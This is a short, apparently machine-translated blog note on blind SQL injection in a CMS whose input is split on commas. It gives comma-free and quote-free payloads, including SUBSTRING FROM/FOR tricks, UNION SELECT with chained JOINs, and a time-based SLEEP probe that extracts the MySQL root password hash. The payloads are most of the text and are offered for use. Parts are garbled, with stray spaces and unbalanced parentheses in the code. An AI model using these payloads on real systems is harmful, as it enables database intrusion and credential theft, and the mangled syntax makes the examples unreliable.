[SQLi] Do not use single quotes | SQL statement with commas (,)
Background
Audit cms found an environment like this:
$ L_id = get ('arr', 'l _ id'); $ ids = explode (',', $ l_id );
Concatenate the array requests in post, and then separate them with commas (,). Finally, an SQL query is provided.
As a result, you may not be able to use commas.
Default
Display_error = off
No explicit error. Only blind injection is allowed.
Solution:
It mainly solves the comma problem of substring.
Select * from table1 where id = 1 and exists (select * from table2 where ord (substring (username from 1 for 1) = 97 ); 127 'Union SELECT * FROM (SELECT 1) a JOIN (SELECT 2) B JOIN (SELECT 3) c JOIN (SELECT 4) d JOIN (SELECT 5) e) # select case when substring (select password from mysql. user where user = 'root') from 1 for 1) = 'E' then sleep (5) else 0 end # substring (select password from mysql. user where user = 'root') from-1) = 'E'
The preceding example is based on your own situation.